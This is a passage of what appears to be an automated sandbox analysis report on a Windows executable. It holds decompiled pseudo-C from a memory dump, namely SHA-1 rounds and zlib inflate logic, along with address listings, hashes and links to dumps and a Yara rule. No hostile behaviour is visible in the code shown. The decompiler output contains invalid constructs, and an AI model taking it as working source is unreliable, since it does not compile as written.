				_t1704 = _t1134 - 0x359d3e2a + (_t1702 ^ _t1808 ^ _t1846) + _t1650 +  *(_t1849 + 0x54);
				_t1074 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1654 = _t1074[0xa] ^ _t1074[0xf] ^  *(_t1849 + 0x48) ^ _t1074[5];
				asm("rol edx, 1");
				_t1074[0xd] = _t1654;
				asm("ror ebx, 0x2");
				_t1810 = _t1704 - 0x359d3e2a + (_t1134 ^ _t1808 ^ _t1846) + _t1654 +  *(_t1849 + 0x50);
				_t1080 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1658 = _t1080[0xb] ^  *_t1080 ^ _t1080[0xe] ^ _t1080[6];
				asm("rol edx, 1");
				_t1080[0xe] = _t1658;
				asm("ror edi, 0x2");
				_t1458 =  *(_t1849 + 0x68);
				_t1660 = _t1810 - 0x359d3e2a + (_t1134 ^ _t1704 ^ _t1846) + _t1658 +  *(_t1849 + 0x58);
				_t1089 =  *(_t1849 + 0x2c) ^ _t1458[0xf] ^ _t1458[7] ^ _t1458[0xc];
				asm("rol eax, 1");
				_t1458[0xf] = _t1089;
				 *(_t1849 + 0x2c) = _t1089;
				asm("rol ecx, 0x5");
				_t1094 = (_t1134 ^ _t1704 ^ _t1810) +  *(_t1849 + 0x2c) + _t1660 + _t1846 + 0xca62c1d6;
				asm("ror esi, 0x2");
				_t1461 =  *((intOrPtr*)(_t1849 + 0x60));
				 *((intOrPtr*)(_t1461 + 0xc)) =  *((intOrPtr*)(_t1461 + 0xc)) + _t1704;
				 *((intOrPtr*)(_t1461 + 8)) =  *((intOrPtr*)(_t1461 + 8)) + _t1810;
				 *_t1461 =  *_t1461 + _t1094;
				 *((intOrPtr*)(_t1461 + 4)) =  *((intOrPtr*)(_t1461 + 4)) + _t1660;
				 *((intOrPtr*)(_t1461 + 0x10)) =  *((intOrPtr*)(_t1461 + 0x10)) + _t1134;
				return _t1094;
			}












































































































































































































































































                                        0x0040b967
                                        0x0040b970
                                        0x0040b987
                                        0x0040b98b
                                        0x0040b972
                                        0x0040b979
                                        0x0040b97e
                                        0x0040b982
                                        0x0040b982
                                        0x0040b993
                                        0x0040b997
                                        0x0040b99f
                                        0x0040b9aa
                                        0x0040b9af
                                        0x0040b9b3
                                        0x0040b9b7
                                        0x0040b9bf
                                        0x0040b9c5
                                        0x0040b9d1
                                        0x0040b9dc
                                        0x0040b9ed
                                        0x0040b9f5
                                        0x0040ba04
                                        0x0040ba0e
                                        0x0040ba1d
                                        0x0040ba20
                                        0x0040ba2b
                                        0x0040ba2e
                                        0x0040ba40
                                        0x0040ba4a
                                        0x0040ba55
                                        0x0040ba58
                                        0x0040ba63
                                        0x0040ba66
                                        0x0040ba78
                                        0x0040ba7e
                                        0x0040ba91
                                        0x0040ba9c
                                        0x0040baa7
                                        0x0040baaa
                                        0x0040babe
                                        0x0040bac6
                                        0x0040bad1
                                        0x0040bad4
                                        0x0040badf
                                        0x0040bae2
                                        0x0040baf4
                                        0x0040bafe
                                        0x0040bb09
                                        0x0040bb12
                                        0x0040bb1d
                                        0x0040bb20
                                        0x0040bb32
                                        0x0040bb3c
                                        0x0040bb47
                                        0x0040bb50
                                        0x0040bb5b
                                        0x0040bb5e
                                        0x0040bb70
                                        0x0040bb76
                                        0x0040bb8b
                                        0x0040bb8e
                                        0x0040bb99
                                        0x0040bba1
                                        0x0040bbb0
                                        0x0040bbb8
                                        0x0040bbc3
                                        0x0040bbcc
                                        0x0040bbd7
                                        0x0040bbdf
                                        0x0040bbec
                                        0x0040bbf8
                                        0x0040bc01
                                        0x0040bc10
                                        0x0040bc1b
                                        0x0040bc1e
                                        0x0040bc32
                                        0x0040bc3a
                                        0x0040bc45
                                        0x0040bc4c
                                        0x0040bc4e
                                        0x0040bc52
                                        0x0040bc55
                                        0x0040bc5e
                                        0x0040bc61
                                        0x0040bc6f
                                        0x0040bc73
                                        0x0040bc7f
                                        0x0040bc84
                                        0x0040bc92
                                        0x0040bc9a
                                        0x0040bca3
                                        0x0040bcab
                                        0x0040bcba
                                        0x0040bcc4
                                        0x0040bcd1
                                        0x0040bcd3
                                        0x0040bcd8
                                        0x0040bcdc
                                        0x0040bce4
                                        0x0040bcec
                                        0x0040bcf5
                                        0x0040bcfb
                                        0x0040bd05
                                        0x0040bd18
                                        0x0040bd1c
                                        0x0040bd25
                                        0x0040bd28
                                        0x0040bd2b
                                        0x0040bd39
                                        0x0040bd3f
                                        0x0040bd49
                                        0x0040bd5c
                                        0x0040bd60
                                        0x0040bd67
                                        0x0040bd6a
                                        0x0040bd78
                                        0x0040bd7e
                                        0x0040bd83
                                        0x0040bda5
                                        0x0040bda7
                                        0x0040bdb1
                                        0x0040bdb3
                                        0x0040bdb8
                                        0x0040bdbb
                                        0x0040bdd1
                                        0x0040bde5
                                        0x0040bde7
                                        0x0040bde9
                                        0x0040bdee
                                        0x0040bdf1
                                        0x0040be08
                                        0x0040be0c
                                        0x0040be22
                                        0x0040be24
                                        0x0040be26
                                        0x0040be29
                                        0x0040be2e
                                        0x0040be3f
                                        0x0040be4e
                                        0x0040be50
                                        0x0040be5a
                                        0x0040be5e
                                        0x0040be60
                                        0x0040be65
                                        0x0040be69
                                        0x0040be7e
                                        0x0040be83
                                        0x0040be87
                                        0x0040be94
                                        0x0040be98
                                        0x0040be9a
                                        0x0040be9f
                                        0x0040bea7
                                        0x0040beb8
                                        0x0040bebb
                                        0x0040bebd
                                        0x0040bec1
                                        0x0040bec7
                                        0x0040bed5
                                        0x0040bed9
                                        0x0040bedb
                                        0x0040beee
                                        0x0040bef3
                                        0x0040bef7
                                        0x0040bef9
                                        0x0040bf06
                                        0x0040bf0a
                                        0x0040bf0c
                                        0x0040bf11
                                        0x0040bf1b
                                        0x0040bf28
                                        0x0040bf2d
                                        0x0040bf31
                                        0x0040bf33
                                        0x0040bf40
                                        0x0040bf44
                                        0x0040bf46
                                        0x0040bf4c
                                        0x0040bf55
                                        0x0040bf6c
                                        0x0040bf6f
                                        0x0040bf71
                                        0x0040bf75
                                        0x0040bf79
                                        0x0040bf86
                                        0x0040bf89
                                        0x0040bf8b
                                        0x0040bf9c
                                        0x0040bfa1
                                        0x0040bfa5
                                        0x0040bfa7
                                        0x0040bfab
                                        0x0040bfaf
                                        0x0040bfbd
                                        0x0040bfc0
                                        0x0040bfc2
                                        0x0040bfd3
                                        0x0040bfd8
                                        0x0040bfdc
                                        0x0040bfde
                                        0x0040bfe2
                                        0x0040bfe6
                                        0x0040bff4
                                        0x0040bff7
                                        0x0040bff9
                                        0x0040c012
                                        0x0040c015
                                        0x0040c019
                                        0x0040c01b
                                        0x0040c01f
                                        0x0040c023
                                        0x0040c026
                                        0x0040c029
                                        0x0040c02b
                                        0x0040c044
                                        0x0040c047
                                        0x0040c04d
                                        0x0040c04f
                                        0x0040c053
                                        0x0040c057
                                        0x0040c05a
                                        0x0040c064
                                        0x0040c066
                                        0x0040c06d
                                        0x0040c072
                                        0x0040c081
                                        0x0040c085
                                        0x0040c087
                                        0x0040c091
                                        0x0040c095
                                        0x0040c09b
                                        0x0040c09e
                                        0x0040c0a0
                                        0x0040c0b1
                                        0x0040c0b6
                                        0x0040c0ba
                                        0x0040c0bc
                                        0x0040c0c0
                                        0x0040c0c4
                                        0x0040c0d0
                                        0x0040c0d3
                                        0x0040c0d5
                                        0x0040c0e0
                                        0x0040c0e5
                                        0x0040c0e9
                                        0x0040c0eb
                                        0x0040c0ef
                                        0x0040c0f3
                                        0x0040c100
                                        0x0040c103
                                        0x0040c105
                                        0x0040c110
                                        0x0040c11b
                                        0x0040c11f
                                        0x0040c121
                                        0x0040c125
                                        0x0040c129
                                        0x0040c134
                                        0x0040c137
                                        0x0040c139
                                        0x0040c145
                                        0x0040c153
                                        0x0040c155
                                        0x0040c15f
                                        0x0040c169
                                        0x0040c16c
                                        0x0040c16e
                                        0x0040c171
                                        0x0040c176
                                        0x0040c181
                                        0x0040c18e
                                        0x0040c192
                                        0x0040c194
                                        0x0040c198
                                        0x0040c19c
                                        0x0040c1a5
                                        0x0040c1a8
                                        0x0040c1aa
                                        0x0040c1af
                                        0x0040c1bf
                                        0x0040c1ca
                                        0x0040c1cf
                                        0x0040c1d2
                                        0x0040c1d6
                                        0x0040c1d8
                                        0x0040c1dd
                                        0x0040c1e5
                                        0x0040c1f0
                                        0x0040c1f3
                                        0x0040c1f7
                                        0x0040c209
                                        0x0040c20c
                                        0x0040c20e
                                        0x0040c213
                                        0x0040c219
                                        0x0040c226
                                        0x0040c229
                                        0x0040c22d
                                        0x0040c22f
                                        0x0040c233
                                        0x0040c246
                                        0x0040c249
                                        0x0040c24d
                                        0x0040c24f
                                        0x0040c256
                                        0x0040c25b
                                        0x0040c268
                                        0x0040c26a
                                        0x0040c26e
                                        0x0040c272
                                        0x0040c275
                                        0x0040c280
                                        0x0040c283
                                        0x0040c289
                                        0x0040c28d
                                        0x0040c290
                                        0x0040c298
                                        0x0040c2a3
                                        0x0040c2a5
                                        0x0040c2a9
                                        0x0040c2ad
                                        0x0040c2b8
                                        0x0040c2bb
                                        0x0040c2c1
                                        0x0040c2c8
                                        0x0040c2cc
                                        0x0040c2cf
                                        0x0040c2d7
                                        0x0040c2da
                                        0x0040c2de
                                        0x0040c2e2
                                        0x0040c2e8
                                        0x0040c2f7
                                        0x0040c2fa
                                        0x0040c2fc
                                        0x0040c313
                                        0x0040c317
                                        0x0040c319
                                        0x0040c31c
                                        0x0040c320
                                        0x0040c32f
                                        0x0040c338
                                        0x0040c33a
                                        0x0040c345
                                        0x0040c34e
                                        0x0040c358
                                        0x0040c35b
                                        0x0040c35d
                                        0x0040c361
                                        0x0040c36b
                                        0x0040c377
                                        0x0040c37a
                                        0x0040c37c
                                        0x0040c397
                                        0x0040c39b
                                        0x0040c39d
                                        0x0040c3a0
                                        0x0040c3a6
                                        0x0040c3b0
                                        0x0040c3b9
                                        0x0040c3bc
                                        0x0040c3be
                                        0x0040c3d9
                                        0x0040c3dd
                                        0x0040c3df
                                        0x0040c3e2
                                        0x0040c3e8
                                        0x0040c3f2
                                        0x0040c3fb
                                        0x0040c3fe
                                        0x0040c400
                                        0x0040c417
                                        0x0040c419
                                        0x0040c41d
                                        0x0040c423
                                        0x0040c427
                                        0x0040c42a
                                        0x0040c438
                                        0x0040c43f
                                        0x0040c441
                                        0x0040c458
                                        0x0040c45c
                                        0x0040c45e
                                        0x0040c461
                                        0x0040c467
                                        0x0040c471
                                        0x0040c47c
                                        0x0040c47f
                                        0x0040c481
                                        0x0040c498
                                        0x0040c49c
                                        0x0040c49e
                                        0x0040c4a1
                                        0x0040c4a7
                                        0x0040c4af
                                        0x0040c4bb
                                        0x0040c4be
                                        0x0040c4c0
                                        0x0040c4d7
                                        0x0040c4db
                                        0x0040c4dd
                                        0x0040c4e0
                                        0x0040c4e6
                                        0x0040c4e9
                                        0x0040c4f5
                                        0x0040c4f8
                                        0x0040c4fa
                                        0x0040c51a
                                        0x0040c51e
                                        0x0040c520
                                        0x0040c523
                                        0x0040c529
                                        0x0040c533
                                        0x0040c53c
                                        0x0040c53f
                                        0x0040c541
                                        0x0040c55c
                                        0x0040c560
                                        0x0040c562
                                        0x0040c565
                                        0x0040c56b
                                        0x0040c575
                                        0x0040c57e
                                        0x0040c581
                                        0x0040c583
                                        0x0040c596
                                        0x0040c5a2
                                        0x0040c5a6
                                        0x0040c5b1
                                        0x0040c5b4
                                        0x0040c5b6
                                        0x0040c5bb
                                        0x0040c5bf
                                        0x0040c5c2
                                        0x0040c5d6
                                        0x0040c5df
                                        0x0040c5e3
                                        0x0040c5ec
                                        0x0040c5ee
                                        0x0040c5f2
                                        0x0040c5fe
                                        0x0040c60b
                                        0x0040c60d
                                        0x0040c614
                                        0x0040c61d
                                        0x0040c625
                                        0x0040c629
                                        0x0040c62b
                                        0x0040c639
                                        0x0040c63c
                                        0x0040c63e
                                        0x0040c649
                                        0x0040c64d
                                        0x0040c662
                                        0x0040c666
                                        0x0040c668
                                        0x0040c66c
                                        0x0040c670
                                        0x0040c673
                                        0x0040c67e
                                        0x0040c681
                                        0x0040c68b
                                        0x0040c68f
                                        0x0040c694
                                        0x0040c6a9
                                        0x0040c6ad
                                        0x0040c6af
                                        0x0040c6b3
                                        0x0040c6b6
                                        0x0040c6ba
                                        0x0040c6c5
                                        0x0040c6c8
                                        0x0040c6d2
                                        0x0040c6d6
                                        0x0040c6dd
                                        0x0040c6e6
                                        0x0040c6ec
                                        0x0040c6f1
                                        0x0040c6fb
                                        0x0040c6fd
                                        0x0040c703
                                        0x0040c70e
                                        0x0040c711
                                        0x0040c713
                                        0x0040c724
                                        0x0040c72a
                                        0x0040c72f
                                        0x0040c739
                                        0x0040c73b
                                        0x0040c741
                                        0x0040c74d
                                        0x0040c750
                                        0x0040c752
                                        0x0040c765
                                        0x0040c768
                                        0x0040c770
                                        0x0040c77a
                                        0x0040c78d
                                        0x0040c794
                                        0x0040c79a
                                        0x0040c7ab
                                        0x0040c7ae
                                        0x0040c7b1
                                        0x0040c7b4
                                        0x0040c7b6
                                        0x0040c7c0
                                        0x0040c7c3
                                        0x0040c7cb
                                        0x0040c7d6
                                        0x0040c7db
                                        0x0040c7df
                                        0x0040c7f3
                                        0x0040c7fd
                                        0x0040c800
                                        0x0040c802
                                        0x0040c809
                                        0x0040c80e
                                        0x0040c81d
                                        0x0040c821
                                        0x0040c825
                                        0x0040c82d
                                        0x0040c832
                                        0x0040c835
                                        0x0040c837
                                        0x0040c83c
                                        0x0040c844
                                        0x0040c849
                                        0x0040c858
                                        0x0040c85c
                                        0x0040c863
                                        0x0040c868
                                        0x0040c86b
                                        0x0040c86d
                                        0x0040c872
                                        0x0040c87a
                                        0x0040c87f
                                        0x0040c88e
                                        0x0040c892
                                        0x0040c89a
                                        0x0040c89f
                                        0x0040c8a2
                                        0x0040c8a8
                                        0x0040c8ac
                                        0x0040c8b9
                                        0x0040c8c4
                                        0x0040c8c8
                                        0x0040c8cc
                                        0x0040c8d0
                                        0x0040c8d3
                                        0x0040c8dd
                                        0x0040c8e1
                                        0x0040c8e7
                                        0x0040c8f0
                                        0x0040c8f3
                                        0x0040c8f5
                                        0x0040c903
                                        0x0040c90e
                                        0x0040c912
                                        0x0040c914
                                        0x0040c918
                                        0x0040c91c
                                        0x0040c925
                                        0x0040c928
                                        0x0040c92a
                                        0x0040c933
                                        0x0040c93e
                                        0x0040c942
                                        0x0040c944
                                        0x0040c948
                                        0x0040c94c
                                        0x0040c955
                                        0x0040c958
                                        0x0040c95a
                                        0x0040c963
                                        0x0040c96e
                                        0x0040c974
                                        0x0040c978
                                        0x0040c983
                                        0x0040c986
                                        0x0040c988
                                        0x0040c98d
                                        0x0040c995
                                        0x0040c9a6
                                        0x0040c9ac
                                        0x0040c9af
                                        0x0040c9b8
                                        0x0040c9bc
                                        0x0040c9c3
                                        0x0040c9c6
                                        0x0040c9c8
                                        0x0040c9cf
                                        0x0040c9d5
                                        0x0040c9e0
                                        0x0040c9e4
                                        0x0040c9e8
                                        0x0040c9f1
                                        0x0040c9f3
                                        0x0040c9f7
                                        0x0040ca04
                                        0x0040ca07
                                        0x0040ca09
                                        0x0040ca10
                                        0x0040ca1d
                                        0x0040ca22
                                        0x0040ca28
                                        0x0040ca2c
                                        0x0040ca2e
                                        0x0040ca36
                                        0x0040ca4a
                                        0x0040ca57
                                        0x0040ca5b
                                        0x0040ca66
                                        0x0040ca6b
                                        0x0040ca6d
                                        0x0040ca73
                                        0x0040ca76
                                        0x0040ca79
                                        0x0040ca85
                                        0x0040ca8a
                                        0x0040ca8e
                                        0x0040ca9b
                                        0x0040ca9e
                                        0x0040caa0
                                        0x0040caa3
                                        0x0040caa7
                                        0x0040cabc
                                        0x0040cac7
                                        0x0040cac9
                                        0x0040cacf
                                        0x0040cad2
                                        0x0040cad5
                                        0x0040cadf
                                        0x0040cae2
                                        0x0040cae4
                                        0x0040caf1
                                        0x0040cafa
                                        0x0040cb02
                                        0x0040cb04
                                        0x0040cb0a
                                        0x0040cb18
                                        0x0040cb1b
                                        0x0040cb1d
                                        0x0040cb2c
                                        0x0040cb31
                                        0x0040cb39
                                        0x0040cb3b
                                        0x0040cb41
                                        0x0040cb4f
                                        0x0040cb52
                                        0x0040cb54
                                        0x0040cb63
                                        0x0040cb6c
                                        0x0040cb6e
                                        0x0040cb72
                                        0x0040cb78
                                        0x0040cb84
                                        0x0040cb88
                                        0x0040cb8a
                                        0x0040cb9f
                                        0x0040cba2
                                        0x0040cba4
                                        0x0040cbaa
                                        0x0040cbb7
                                        0x0040cbba
                                        0x0040cbbc
                                        0x0040cbc3
                                        0x0040cbd4
                                        0x0040cbd6
                                        0x0040cbdc
                                        0x0040cbe7
                                        0x0040cbea
                                        0x0040cbec
                                        0x0040cbf3
                                        0x0040cc0a
                                        0x0040cc0e
                                        0x0040cc1a
                                        0x0040cc1d
                                        0x0040cc1f
                                        0x0040cc24
                                        0x0040cc2c
                                        0x0040cc37
                                        0x0040cc39
                                        0x0040cc3c
                                        0x0040cc40
                                        0x0040cc43
                                        0x0040cc46
                                        0x0040cc48
                                        0x0040cc4b
                                        0x0040cc55

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: memcpy
                                        • String ID:
                                        • API String ID: 3510742995-0
                                        • Opcode ID: 9c3f83e6cdc7626677f98a10da7a9861c6281acbbc1827985ce28e68b1e583b0
                                        • Instruction ID: 7363b34d98ec71506a68132c2b1ea8468f81af161be419ff9824dd4ca2d657f1
                                        • Opcode Fuzzy Hash: 9c3f83e6cdc7626677f98a10da7a9861c6281acbbc1827985ce28e68b1e583b0
                                        • Instruction Fuzzy Hash: 54D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F86A, Relevance: 2.1, Strings: 1, Instructions: 840COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E0040F86A(signed char* __ebx, unsigned int __edx, void** __edi, signed int __esi) {
				signed int _t697;
				signed int _t727;
				intOrPtr _t729;
				signed int _t737;
				void* _t741;
				void* _t742;
				void* _t743;
				void* _t748;
				signed int _t751;
				signed int _t867;
				signed char* _t868;
				void** _t870;
				signed char** _t894;
				signed char** _t901;
				signed int _t1012;
				unsigned int _t1014;
				signed int _t1015;
				signed int _t1016;
				intOrPtr _t1019;
				void* _t1020;
				void** _t1063;
				signed int _t1064;
				signed char** _t1065;
				signed int _t1091;
				int _t1093;
				signed int _t1097;
				intOrPtr _t1099;
				signed int _t1100;
				void* _t1104;

				L0:
				while(1) {
					L0:
					_t1091 = __esi;
					_t1063 = __edi;
					_t1014 = __edx;
					_t868 = __ebx;
					if(__esi >= 0xe) {
						goto L182;
					}
					L178:
					while(1) {
						L179:
						if(__ebp == 0) {
							break;
						}
						L180:
						__eax =  *__ebx & 0x000000ff;
						__eax = ( *__ebx & 0x000000ff) << __cl;
						__ebx = __ebx + 1;
						__edx = __edx + __eax;
						 *(__esp + 0x14) = __ebx;
						__esi = __esi + 8;
						 *(__esp + 0x10) = __edx;
						__ebp = __ebp - 1;
						if(__esi < 0xe) {
							continue;
						} else {
							L181:
							goto L182;
						}
						L360:
					}
					L95:
					_t1064 =  *(_t1104 + 0x10);
					L96:
					_t1019 =  *((intOrPtr*)(_t1104 + 0x4c));
					L97:
					_t901 =  *(_t1104 + 0x48);
					_t870 =  *(_t1104 + 0x20);
					_t901[3] =  *(_t1104 + 0x24);
					_t901[4] =  *(_t1104 + 0x18);
					_t901[1] = _t1097;
					_t1099 =  *((intOrPtr*)(_t1104 + 0x28));
					 *_t901 =  *(_t1104 + 0x14);
					_t870[0xe] = _t1064;
					_t870[0xf] = _t1091;
					if(_t870[0xa] != 0) {
						L102:
						_t727 = E00410880(_t901, _t901[3], _t1099 - _t901[4]);
						_t1104 = _t1104 + 0xc;
						if(_t727 == 0) {
							L343:
							_t901 =  *(_t1104 + 0x48);
							goto L344;
						} else {
							L103:
							 *_t870 = 0x1e;
							L104:
							_t737 = 0xfffffffc;
							goto L105;
						}
					} else {
						L98:
						if(_t1099 == _t901[4]) {
							L344:
							_t729 =  *((intOrPtr*)(_t1104 + 0x3c)) - _t901[1];
							_t1100 = _t1099 - _t901[4];
							_t901[2] =  &(_t901[2][_t729]);
							_t901[5] =  &(_t901[5][_t1100]);
							_t870[7] = _t870[7] + _t1100;
							 *((intOrPtr*)(_t1104 + 0x3c)) = _t729;
							if(_t870[2] == 0) {
								L349:
								_t1065 =  *(_t1104 + 0x48);
							} else {
								L345:
								if(_t1100 == 0) {
									goto L349;
								} else {
									L346:
									_push(_t1100);
									_push(_t901[3] - _t1100);
									_push(_t870[6]);
									if(_t870[4] == 0) {
										_t741 = E00411170();
										_t1065 =  *(_t1104 + 0x54);
										_t1104 = _t1104 + 0xc;
										_t870[6] = _t741;
										_t1065[0xc] = _t741;
									} else {
										_t742 = E00410970();
										_t1065 =  *(_t1104 + 0x54);
										_t1104 = _t1104 + 0xc;
										_t870[6] = _t742;
										_t1065[0xc] = _t742;
									}
								}
							}
							L350:
							_t1020 =  *_t870;
							if(_t1020 == 0x13) {
								L353:
								_t1093 = 0x100;
							} else {
								L351:
								if(_t1020 == 0xe) {
									goto L353;
								} else {
									L352:
									_t1093 = 0;
								}
							}
							L354:
							asm("sbb ecx, ecx");
							_t1020 - 0xb =  *((intOrPtr*)(_t1104 + 0x3c));
							_t1065[0xb] = ((0 | _t1020 != 0x0000000b) - 0x00000001 & 0x00000080) + ( ~(_t870[1]) & 0x00000040) + _t1093 + _t870[0xf];
							if( *((intOrPtr*)(_t1104 + 0x3c)) != 0) {
								L356:
								if( *((intOrPtr*)(_t1104 + 0x4c)) != 4) {
									L359:
									return  *(_t1104 + 0x2c);
								} else {
									goto L357;
								}
							} else {
								L355:
								if(_t1100 == 0) {
									L357:
									_t737 =  *(_t1104 + 0x2c);
									if(_t737 != 0) {
										L105:
										return _t737;
									} else {
										L358:
										return 0xfffffffb;
									}
								} else {
									goto L356;
								}
							}
						} else {
							L99:
							_t743 =  *_t870;
							if(_t743 >= 0x1d) {
								goto L344;
							} else {
								L100:
								if(_t743 < 0x1a) {
									goto L102;
								} else {
									L101:
									if(_t1019 == 4) {
										goto L344;
									} else {
										goto L102;
									}
								}
							}
						}
					}
					goto L360;
					L182:
					_t1091 = _t1091 - 0xe;
					_t1015 = _t1014 >> 5;
					_t1063[0x18] = (_t1014 & 0x0000001f) + 0x101;
					_t1016 = _t1015 >> 5;
					_t1063[0x19] = 1 + (_t1015 & 0x0000001f);
					_t1014 = _t1016 >> 4;
					 *(_t1104 + 0x10) = _t1014;
					_t1063[0x17] = (_t1016 & 0x0000000f) + 4;
					if(_t1063[0x18] > 0x11e) {
						L195:
						_t894[6] = "too many length or distance symbols";
						 *_t1063 = 0x1d;
						goto L175;
					} else {
						L183:
						if(_t1063[0x19] > 0x1e) {
							goto L195;
						} else {
							L184:
							_t1063[0x1a] = 0;
							 *_t1063 = 0x11;
							L185:
							if(_t1063[0x1a] >= _t1063[0x17]) {
								L191:
								while(_t1063[0x1a] < 0x13) {
									L192:
									 *(_t1063 + 0x70 + ( *(0x413fc0 + _t1063[0x1a] * 2) & 0x0000ffff) * 2) = 0;
									_t1063[0x1a] = 1 + _t1063[0x1a];
								}
								L193:
								_t748 =  &(_t1063[0x14c]);
								_t1063[0x15] = 7;
								_t1063[0x13] = _t748;
								_t1063[0x1b] = _t748;
								_t751 = E00411490(0,  &(_t1063[0x1c]), 0x13,  &(_t1063[0x1b]),  &(_t1063[0x15]),  &(_t1063[0xbc]));
								_t1104 = _t1104 + 0x18;
								 *(_t1104 + 0x2c) = _t751;
								if(_t751 == 0) {
									L196:
									_t1063[0x1a] = 0;
									 *_t1063 = 0x12;
									goto L197;
								} else {
									L194:
									_t894 =  *(_t1104 + 0x48);
									_t1014 =  *(_t1104 + 0x10);
									_t894[6] = "invalid code lengths set";
									 *_t1063 = 0x1d;
									while(1) {
										L175:
										_t697 =  *_t1063;
										if(_t697 > 0x1e) {
											break;
										}
										L1:
										switch( *((intOrPtr*)(_t697 * 4 +  &M004104E0))) {
											case 0:
												L2:
												_t707 = _t1063[2];
												if(_t707 != 0) {
													L4:
													__eflags = _t1091 - 0x10;
													if(_t1091 >= 0x10) {
														L9:
														__eflags = _t707 & 0x00000002;
														if((_t707 & 0x00000002) == 0) {
															L12:
															_t708 = _t1063[8];
															_t1063[4] = 0;
															__eflags = _t708;
															if(_t708 != 0) {
																 *(_t708 + 0x30) = 0xffffffff;
															}
															L14:
															__eflags = _t1063[2] & 0x00000001;
															if((_t1063[2] & 0x00000001) == 0) {
																L24:
																_t894[6] = "incorrect header check";
																 *_t1063 = 0x1d;
															} else {
																L15:
																_t711 = (_t1014 >> 8) + ((_t1014 & 0x000000ff) << 8);
																__eflags = _t711 % 0x1f;
																_t1014 =  *(_t1104 + 0x10);
																if(_t711 % 0x1f != 0) {
																	_t894 =  *(_t1104 + 0x48);
																	goto L24;
																} else {
																	L16:
																	__eflags = (_t1014 & 0x0000000f) - 8;
																	if((_t1014 & 0x0000000f) == 8) {
																		L18:
																		_t715 = _t1063[9];
																		_t1091 = _t1091 - 4;
																		_t1014 = _t1014 >> 4;
																		 *(_t1104 + 0x10) = _t1014;
																		_t900 = (_t1014 & 0x0000000f) + 8;
																		__eflags = _t715;
																		if(_t715 != 0) {
																			L21:
																			__eflags = _t900 - _t715;
																			if(_t900 <= _t715) {
																				goto L20;
																			} else {
																				_t894 =  *(_t1104 + 0x48);
																				_t894[6] = "invalid window size";
																				 *_t1063 = 0x1d;
																			}
																		} else {
																			_t1063[9] = _t900;
																			L20:
																			_push(0);
																			_push(0);
																			_push(0);
																			_t1063[5] = 1 << _t900;
																			_t718 = E00411170();
																			_t1021 =  *(_t1104 + 0x1c);
																			_t1104 = _t1104 + 0xc;
																			_t894 =  *(_t1104 + 0x48);
																			_t1063[6] = _t718;
																			_t894[0xc] = _t718;
																			 *_t1063 =  !(_t1021 >> 8) & 0x00000002 | 0x00000009;
																			_t1014 = 0;
																			 *(_t1104 + 0x10) = 0;
																			_t1091 = 0;
																		}
																	} else {
																		_t894 =  *(_t1104 + 0x48);
																		_t894[6] = "unknown compression method";
																		 *_t1063 = 0x1d;
																	}
																}
															}
														} else {
															L10:
															__eflags = _t1014 - 0x8b1f;
															if(_t1014 != 0x8b1f) {
																goto L12;
															} else {
																_push(0);
																_push(0);
																_push(0);
																_t1063[6] = E00410970();
																_push(2);
																_push(_t1104 + 0x28);
																 *(_t1104 + 0x30) = 0x8b1f;
																_push(_t1063[6]);
																_t721 = E00410970();
																_t1014 = 0;
																_t1063[6] = _t721;
																_t1104 = _t1104 + 0x18;
																 *(_t1104 + 0x10) = 0;
																_t1091 = 0;
																 *_t1063 = 1;
																goto L174;
															}
														}
														goto L175;
													} else {
														while(1) {
															L6:
															__eflags = _t1097;
															if(_t1097 == 0) {
																goto L95;
															}
															L7:
															_t745 = ( *_t868 & 0x000000ff) << _t1091;
															_t868 =  &(_t868[1]);
															_t1014 = _t1014 + _t745;
															 *(_t1104 + 0x14) = _t868;
															_t1091 = _t1091 + 8;
															 *(_t1104 + 0x10) = _t1014;
															_t1097 = _t1097 - 1;
															__eflags = _t1091 - 0x10;
															if(_t1091 < 0x10) {
																continue;
															} else {
																_t707 = _t1063[2];
																_t894 =  *(_t1104 + 0x48);
																goto L9;
															}
															goto L360;
														}
														goto L95;
													}
												} else {
													 *_t1063 = 0xc;
													goto L175;
												}
												goto L360;
											case 1:
												L25:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L29:
													__edi[4] = __edx;
													__eflags = __dl - 8;
													if(__dl == 8) {
														L31:
														__eflags = __edx & 0x0000e000;
														if((__edx & 0x0000e000) == 0) {
															L33:
															__ecx = __edi[8];
															__eflags = __ecx;
															if(__ecx != 0) {
																__edx = __edx >> 8;
																__eax = __edx >> 0x00000008 & 0x00000001;
																__eflags = __eax;
																 *__ecx = __eax;
															}
															__eflags = __edi[4] & 0x00000200;
															if((__edi[4] & 0x00000200) != 0) {
																 *(__esp + 0x1c) = __dl;
																__eax = __esp + 0x1c;
																_push(2);
																__eflags = __edx;
																_push(__eax);
																 *(__esp + 0x25) = __dl;
																_push(__edi[6]);
																__eax = E00410970();
																__esp = __esp + 0xc;
																__edi[6] = __eax;
															}
															__edx = 0;
															 *__edi = 2;
															 *(__esp + 0x10) = 0;
															__esi = 0;
															goto L40;
														} else {
															L32:
															 *(0x18 + __ecx) = "unknown header flags set";
															 *__edi = 0x1d;
															goto L175;
														}
													} else {
														L30:
														 *(0x18 + __ecx) = "unknown compression method";
														 *__edi = 0x1d;
														goto L175;
													}
												} else {
													while(1) {
														L26:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L27:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
